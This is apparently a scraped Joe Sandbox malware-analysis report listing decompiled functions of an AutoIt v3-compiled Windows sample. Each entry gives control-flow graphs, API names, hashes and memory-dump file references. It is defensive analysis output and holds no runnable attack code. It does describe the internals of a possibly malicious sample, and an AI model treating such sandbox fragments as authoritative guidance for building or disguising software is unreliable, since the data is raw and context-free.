                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                          • Instruction ID: 138c6e3fe723e68804440bbbd9c33aa5fe239fefeb1a688a5b10ddd7bee6064c
                                                                          • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                          • Instruction Fuzzy Hash: 03518E3292E7538EF620FB14E9142B9E665EF49B80FC60031D59D826B1FE6CF9079320
                                                                          Function 00007FF7ADC03D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-2659433951
                                                                          • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                          • Instruction ID: 98f426c50778554974e755a4d02dedae1649d78d6f749fd417f72bbc82eb10ae
                                                                          • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                          • Instruction Fuzzy Hash: 6C313432A19B419EE700EF60E8443A877B4FB48B48FD10138CA9D16B64EF7CE55ACB50
                                                                          Function 00007FF7ADC1E958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 189 7ff7adc1e958-7ff7adc1e9ae 190 7ff7adc627e4-7ff7adc627ea DestroyWindow 189->190 191 7ff7adc1e9b4-7ff7adc1e9d3 mciSendStringW 189->191 194 7ff7adc627f0-7ff7adc62801 190->194 192 7ff7adc1e9d9-7ff7adc1e9e3 191->192 193 7ff7adc1ecbd-7ff7adc1ecce 191->193 192->194 197 7ff7adc1e9e9 192->197 195 7ff7adc1ecf7-7ff7adc1ed01 193->195 196 7ff7adc1ecd0-7ff7adc1ecf0 UnregisterHotKey 193->196 199 7ff7adc62803-7ff7adc62806 194->199 200 7ff7adc62835-7ff7adc6283f 194->200 195->192 202 7ff7adc1ed07 195->202 196->195 201 7ff7adc1ecf2 call 7ff7adc1f270 196->201 198 7ff7adc1e9f0-7ff7adc1e9f3 197->198 203 7ff7adc1e9f9-7ff7adc1ea08 call 7ff7adc03aa8 198->203 204 7ff7adc1ecb0-7ff7adc1ecb8 call 7ff7adc05410 198->204 205 7ff7adc62808-7ff7adc62811 call 7ff7adc08314 199->205 206 7ff7adc62813-7ff7adc62817 FindClose 199->206 200->194 208 7ff7adc62841 200->208 201->195 202->193 218 7ff7adc1ea0f-7ff7adc1ea12 203->218 204->198 211 7ff7adc6281d-7ff7adc6282e 205->211 206->211 217 7ff7adc62846-7ff7adc6284f call 7ff7adc98c00 208->217 211->200 216 7ff7adc62830 call 7ff7adc83180 211->216 216->200 217->218 218->217 221 7ff7adc1ea18 218->221 223 7ff7adc1ea1f-7ff7adc1ea22 221->223 224 7ff7adc1ea28-7ff7adc1ea32 223->224 225 7ff7adc62854-7ff7adc6285d call 7ff7adc746cc 223->225 227 7ff7adc1ea38-7ff7adc1ea42 224->227 228 7ff7adc62862-7ff7adc62873 224->228 225->223 232 7ff7adc6288c-7ff7adc6289d 227->232 233 7ff7adc1ea48-7ff7adc1ea76 call 7ff7adc113e0 227->233 230 7ff7adc6287b-7ff7adc62885 228->230 231 7ff7adc62875 FreeLibrary 228->231 230->228 234 7ff7adc62887 230->234 231->230 235 7ff7adc628c9-7ff7adc628d3 232->235 236 7ff7adc6289f-7ff7adc628c2 VirtualFree 232->236 242 7ff7adc1ea78 233->242 243 7ff7adc1eabf-7ff7adc1eacc OleUninitialize 233->243 234->232 235->232 240 7ff7adc628d5 235->240 236->235 238 7ff7adc628c4 call 7ff7adc8321c 236->238 238->235 244 7ff7adc628da-7ff7adc628de 240->244 246 7ff7adc1ea7d-7ff7adc1eabd call 7ff7adc1f1c4 call 7ff7adc1f13c 242->246 243->244 245 7ff7adc1ead2-7ff7adc1ead9 243->245 244->245 247 7ff7adc628e4-7ff7adc628ef 244->247 248 7ff7adc628f4-7ff7adc62903 call 7ff7adc831d4 245->248 249 7ff7adc1eadf-7ff7adc1eaea 245->249 246->243 247->245 261 7ff7adc62905 248->261 252 7ff7adc1ed09-7ff7adc1ed18 call 7ff7adc242a0 249->252 253 7ff7adc1eaf0-7ff7adc1eb22 call 7ff7adc0a07c call 7ff7adc1f08c call 7ff7adc039bc 249->253 252->253 265 7ff7adc1ed1e 252->265 273 7ff7adc1eb2e-7ff7adc1ebc4 call 7ff7adc039bc call 7ff7adc0a07c call 7ff7adc045c8 * 2 call 7ff7adc0a07c * 3 call 7ff7adc113e0 call 7ff7adc1ee68 call 7ff7adc1ee2c * 3 253->273 274 7ff7adc1eb24-7ff7adc1eb29 call 7ff7adc24c24 253->274 266 7ff7adc6290a-7ff7adc62919 call 7ff7adc73a78 261->266 265->252 272 7ff7adc6291b 266->272 278 7ff7adc62920-7ff7adc6292f call 7ff7adc1e4e4 272->278 273->266 316 7ff7adc1ebca-7ff7adc1ebdc call 7ff7adc039bc 273->316 274->273 283 7ff7adc62931 278->283 286 7ff7adc62936-7ff7adc62945 call 7ff7adc83078 283->286 292 7ff7adc62947 286->292 295 7ff7adc6294c-7ff7adc6295b call 7ff7adc831a8 292->295 301 7ff7adc6295d 295->301 304 7ff7adc62962-7ff7adc62971 call 7ff7adc831a8 301->304 311 7ff7adc62973 304->311 311->311 316->278 319 7ff7adc1ebe2-7ff7adc1ebec 316->319 319->286 320 7ff7adc1ebf2-7ff7adc1ec08 call 7ff7adc0a07c 319->320 323 7ff7adc1ec0e-7ff7adc1ec18 320->323 324 7ff7adc1ed20-7ff7adc1ed25 call 7ff7adc24c24 320->324 326 7ff7adc1ec8a-7ff7adc1eca9 call 7ff7adc0a07c call 7ff7adc24c24 323->326 327 7ff7adc1ec1a-7ff7adc1ec24 323->327 324->190 338 7ff7adc1ecab 326->338 327->295 328 7ff7adc1ec2a-7ff7adc1ec3b 327->328 328->304 331 7ff7adc1ec41-7ff7adc1ed71 call 7ff7adc0a07c * 3 call 7ff7adc1ee10 call 7ff7adc1ed8c 328->331 347 7ff7adc1ed77-7ff7adc1ed88 331->347 348 7ff7adc62978-7ff7adc62987 call 7ff7adc8d794 331->348 338->327 351 7ff7adc62989 348->351 351->351
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                          • String ID: close all
                                                                          • API String ID: 1992507300-3243417748
                                                                          • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                          • Instruction ID: eac179cd931e440ec4bb25761e5ecbef2ea2d26fddb73c1d59d776fa35aa1eba
                                                                          • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                                          • Instruction Fuzzy Hash: FCE12D26B0E91289EE54FB56C56027CA364FF84B44FD65131DB0E932A1EF3CE8638721
                                                                          Function 00007FF7ADC03B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: AutoIt v3
                                                                          • API String ID: 423443420-1704141276
                                                                          • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                          • Instruction ID: fb2494488f24ec98f8f566c721c042944be9359f63e3409351ddd0ae0487cca7
                                                                          • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                          • Instruction Fuzzy Hash: 2D312736A1AB429EE740EB50E8543A8B7B4FB48B44FC10039C94D03764EF7CE45A8760
                                                                          Function 00007FF7ADC47348 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 419 7ff7adc47348-7ff7adc473ba call 7ff7adc47078 422 7ff7adc473bc-7ff7adc473c4 call 7ff7adc355b4 419->422 423 7ff7adc473d3-7ff7adc473dd call 7ff7adc3e418 419->423 430 7ff7adc473c7-7ff7adc473ce call 7ff7adc355d4 422->430 428 7ff7adc473f7-7ff7adc47463 CreateFileW 423->428 429 7ff7adc473df-7ff7adc473f5 call 7ff7adc355b4 call 7ff7adc355d4 423->429 432 7ff7adc47469-7ff7adc47470 428->432 433 7ff7adc474eb-7ff7adc474f6 GetFileType 428->433 429->430 441 7ff7adc4771a-7ff7adc47736 430->441 438 7ff7adc474b8-7ff7adc474e6 GetLastError call 7ff7adc35564 432->438 439 7ff7adc47472-7ff7adc47476 432->439 435 7ff7adc47549-7ff7adc4754f 433->435 436 7ff7adc474f8-7ff7adc47533 GetLastError call 7ff7adc35564 CloseHandle 433->436 444 7ff7adc47551-7ff7adc47554 435->444 445 7ff7adc47556-7ff7adc47559 435->445 436->430 453 7ff7adc47539-7ff7adc47544 call 7ff7adc355d4 436->453 438->430 439->438 446 7ff7adc47478-7ff7adc474b6 CreateFileW 439->446 450 7ff7adc4755e-7ff7adc475ac call 7ff7adc3e334 444->450 445->450 451 7ff7adc4755b 445->451 446->433 446->438 458 7ff7adc475ae-7ff7adc475ba call 7ff7adc47284 450->458 459 7ff7adc475c0-7ff7adc475ea call 7ff7adc46de4 450->459 451->450 453->430 464 7ff7adc475bc 458->464 465 7ff7adc475ef-7ff7adc475f9 call 7ff7adc404b8 458->465 466 7ff7adc475fe-7ff7adc47643 459->466 467 7ff7adc475ec 459->467 464->459 465->441 469 7ff7adc47665-7ff7adc47671 466->469 470 7ff7adc47645-7ff7adc47649 466->470 467->465 473 7ff7adc47718 469->473 474 7ff7adc47677-7ff7adc4767b 469->474 470->469 472 7ff7adc4764b-7ff7adc47660 470->472 472->469 473->441 474->473 475 7ff7adc47681-7ff7adc476c9 CloseHandle CreateFileW 474->475 476 7ff7adc476fe-7ff7adc47713 475->476 477 7ff7adc476cb-7ff7adc476f9 GetLastError call 7ff7adc35564 call 7ff7adc3e548 475->477 476->473 477->476
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                          • String ID:
                                                                          • API String ID: 1617910340-0
                                                                          • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                          • Instruction ID: 223a55949849b7fcbbfe77f280662a1f0e113a2d59e1670da02f01dfd558a46e
                                                                          • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                          • Instruction Fuzzy Hash: 9DC1F173B29A418AEB54DF64D4483AC7762E7497A8F821235DE1E5B3E4EF38E012C350
                                                                          Function 00007FF7ADC125BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 557 7ff7adc125bc-7ff7adc1263d 561 7ff7adc1287e-7ff7adc128af 557->561 562 7ff7adc12643-7ff7adc1267c 557->562 563 7ff7adc12680-7ff7adc12687 562->563 565 7ff7adc1268d-7ff7adc126a1 563->565 566 7ff7adc12856-7ff7adc12876 563->566 568 7ff7adc126a7-7ff7adc126bc 565->568 569 7ff7adc5d148-7ff7adc5d14f 565->569 566->561 570 7ff7adc129c8-7ff7adc129eb PeekMessageW 568->570 571 7ff7adc126c2-7ff7adc126c9 568->571 572 7ff7adc12702-7ff7adc12723 569->572 573 7ff7adc5d155 569->573 576 7ff7adc126e8-7ff7adc126ef 570->576 577 7ff7adc129f1-7ff7adc129f5 570->577 571->570 574 7ff7adc126cf-7ff7adc126d4 571->574 587 7ff7adc1276e-7ff7adc127d2 572->587 588 7ff7adc12725-7ff7adc1272c 572->588 582 7ff7adc5d15a-7ff7adc5d160 573->582 574->570 578 7ff7adc126da-7ff7adc126e2 GetInputState 574->578 579 7ff7adc5e285-7ff7adc5e293 576->579 580 7ff7adc126f5-7ff7adc126fc 576->580 583 7ff7adc129fb-7ff7adc12a05 577->583 584 7ff7adc5d1aa-7ff7adc5d1bb 577->584 578->570 578->576 586 7ff7adc5e29d-7ff7adc5e2b5 call 7ff7adc1f1c4 579->586 580->572 580->586 589 7ff7adc5d19b 582->589 590 7ff7adc5d162-7ff7adc5d176 582->590 583->582 585 7ff7adc12a0b-7ff7adc12a1d call 7ff7adc22de8 583->585 584->576 605 7ff7adc12a1f-7ff7adc12a2d TranslateMessage DispatchMessageW 585->605 606 7ff7adc12a33-7ff7adc12a4f PeekMessageW 585->606 586->566 625 7ff7adc127d8-7ff7adc127da 587->625 626 7ff7adc5e276 587->626 588->587 594 7ff7adc1272e-7ff7adc12738 588->594 589->584 590->589 595 7ff7adc5d178-7ff7adc5d17f 590->595 599 7ff7adc1273f-7ff7adc12742 594->599 595->589 600 7ff7adc5d181-7ff7adc5d190 TranslateAcceleratorW 595->600 601 7ff7adc12748 599->601 602 7ff7adc128b0-7ff7adc128b7 599->602 600->585 603 7ff7adc5d196 600->603 607 7ff7adc1274f-7ff7adc12752 601->607 609 7ff7adc128b9-7ff7adc128cc timeGetTime 602->609 610 7ff7adc128eb-7ff7adc128ef 602->610 603->606 605->606 606->576 611 7ff7adc12a55 606->611 612 7ff7adc12758-7ff7adc12761 607->612 613 7ff7adc128f4-7ff7adc128fb 607->613 615 7ff7adc5d2ab-7ff7adc5d2b0 609->615 616 7ff7adc128d2-7ff7adc128d7 609->616 610->599 611->577 617 7ff7adc12767 612->617 618 7ff7adc5d4c7-7ff7adc5d4ce 612->618 623 7ff7adc5d2f8-7ff7adc5d303 613->623 624 7ff7adc12901-7ff7adc12905 613->624 620 7ff7adc128dc-7ff7adc128e5 615->620 621 7ff7adc5d2b6 615->621 616->620 622 7ff7adc128d9 616->622 617->587 620->610 627 7ff7adc5d2bb-7ff7adc5d2f3 timeGetTime call 7ff7adc22ac0 call 7ff7adc83a28 620->627 621->627 622->620 628 7ff7adc5d309-7ff7adc5d30c 623->628 629 7ff7adc5d305 623->629 624->607 625->626 630 7ff7adc127e0-7ff7adc127ee 625->630 626->579 627->610 632 7ff7adc5d30e 628->632 633 7ff7adc5d312-7ff7adc5d319 628->633 629->628 630->626 636 7ff7adc127f4-7ff7adc12819 630->636 632->633 634 7ff7adc5d31b 633->634 635 7ff7adc5d322-7ff7adc5d329 633->635 634->635 638 7ff7adc5d32b 635->638 639 7ff7adc5d332-7ff7adc5d33d call 7ff7adc242a0 635->639 640 7ff7adc1290a-7ff7adc1290d 636->640 641 7ff7adc1281f-7ff7adc12829 call 7ff7adc12b70 636->641 638->639 639->601 639->618 645 7ff7adc1290f-7ff7adc1291a call 7ff7adc12e30 640->645 646 7ff7adc12931-7ff7adc12933 640->646 649 7ff7adc1282e-7ff7adc12836 641->649 645->649 651 7ff7adc12971-7ff7adc12974 646->651 652 7ff7adc12935-7ff7adc12949 call 7ff7adc166c0 646->652 656 7ff7adc1283c 649->656 657 7ff7adc1299e-7ff7adc129ab 649->657 654 7ff7adc5dfbe-7ff7adc5dfc0 651->654 655 7ff7adc1297a-7ff7adc12997 call 7ff7adc101a0 651->655 659 7ff7adc1294e-7ff7adc12950 652->659 661 7ff7adc5dfed-7ff7adc5dff6 654->661 662 7ff7adc5dfc2-7ff7adc5dfc5 654->662 667 7ff7adc1299c 655->667 665 7ff7adc12840-7ff7adc12843 656->665 663 7ff7adc129b1-7ff7adc129be call 7ff7adc24c24 657->663 664 7ff7adc5e181-7ff7adc5e197 call 7ff7adc24c24 * 2 657->664 659->649 666 7ff7adc12956-7ff7adc12966 659->666 673 7ff7adc5dff8-7ff7adc5e003 661->673 674 7ff7adc5e005-7ff7adc5e00c 661->674 662->665 669 7ff7adc5dfcb-7ff7adc5dfe7 call 7ff7adc13c20 662->669 663->570 664->626 671 7ff7adc12b17-7ff7adc12b1d 665->671 672 7ff7adc12849-7ff7adc12850 665->672 666->649 676 7ff7adc1296c 666->676 667->659 669->661 671->672 677 7ff7adc12b23-7ff7adc12b2d 671->677 672->563 672->566 675 7ff7adc5e00f-7ff7adc5e016 call 7ff7adc98b98 673->675 674->675 688 7ff7adc5e01c-7ff7adc5e036 call 7ff7adc834e4 675->688 689 7ff7adc5e0d7-7ff7adc5e0d9 675->689 682 7ff7adc5e0f4-7ff7adc5e10e call 7ff7adc834e4 676->682 677->569 694 7ff7adc5e147-7ff7adc5e14e 682->694 695 7ff7adc5e110-7ff7adc5e11d 682->695 704 7ff7adc5e038-7ff7adc5e045 688->704 705 7ff7adc5e06f-7ff7adc5e076 688->705 691 7ff7adc5e0db 689->691 692 7ff7adc5e0df-7ff7adc5e0ee call 7ff7adc9a320 689->692 691->692 692->682 694->672 696 7ff7adc5e154-7ff7adc5e15a 694->696 699 7ff7adc5e135-7ff7adc5e142 call 7ff7adc24c24 695->699 700 7ff7adc5e11f-7ff7adc5e130 call 7ff7adc24c24 * 2 695->700 696->672 702 7ff7adc5e160-7ff7adc5e169 696->702 699->694 700->699 702->664 709 7ff7adc5e05d-7ff7adc5e06a call 7ff7adc24c24 704->709 710 7ff7adc5e047-7ff7adc5e058 call 7ff7adc24c24 * 2 704->710 705->672 707 7ff7adc5e07c-7ff7adc5e082 705->707 707->672 713 7ff7adc5e088-7ff7adc5e091 707->713 709->705 710->709 713->689
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                          • String ID:
                                                                          • API String ID: 3249950245-0
                                                                          • Opcode ID: 4e5214824c5420639b9de00f29baad83bafa904f2dd3af1d4c39dffda22c8357
                                                                          • Instruction ID: fc7ccdd00cd7ac18e02af21d08ff00eb028db5c5d06ef7ff0288612af985b143
                                                                          • Opcode Fuzzy Hash: 4e5214824c5420639b9de00f29baad83bafa904f2dd3af1d4c39dffda22c8357
                                                                          • Instruction Fuzzy Hash: 4D229F36A0E7828EFB64AB24D4503B9E7A0FB45B44FD64135DA4E426A5FF3CE446C720
                                                                          Function 00007FF7ADC03CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 849 7ff7adc03cbc-7ff7adc03d88 CreateWindowExW * 2 ShowWindow * 2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$Show
                                                                          • String ID: AutoIt v3$d$edit
                                                                          • API String ID: 2813641753-2600919596
                                                                          • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                          • Instruction ID: 1f88f3a2cb3f06cc2a9657184532823284ce6d6bd297ab8f0a6836a463e02f9a
                                                                          • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                          • Instruction Fuzzy Hash: 1C218E72A2DB418AE750DB10F8583A9B7A0F788B99F824238D68D46664DF7DD44ACB10
                                                                          Function 00007FF7ADC25244 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                          • String ID:
                                                                          • API String ID: 2117695475-0
                                                                          • Opcode ID: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
                                                                          • Instruction ID: 5af1e205f2ab3d3e0e4ab0ba388e84eda5ade48bb74b2e91136c99f61ff3abd9
                                                                          • Opcode Fuzzy Hash: c5af1a2945e0b28d35ed004d247bbfb317608e89d5a488d8119e5cdd6fee6e2c
                                                                          • Instruction Fuzzy Hash: 9F119610E2F2434EFA1873B094562BEE290CFA4701FD60538E91D9A2E3FD5DA9578632
                                                                          Function 00007FF7ADC07EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22D8E
                                                                            • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22D9C
                                                                            • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22DAC
                                                                            • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22DBC
                                                                            • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22DCA
                                                                            • Part of subcall function 00007FF7ADC22D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7ADC07FA5), ref: 00007FF7ADC22DD8
                                                                            • Part of subcall function 00007FF7ADC1EEC8: RegisterWindowMessageW.USER32 ref: 00007FF7ADC1EF76
                                                                          • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC0106D), ref: 00007FF7ADC08209
                                                                          • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC0106D), ref: 00007FF7ADC0828F
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC0106D), ref: 00007FF7ADC4D36A
                                                                          Strings
                                                                          Memory Dump Source
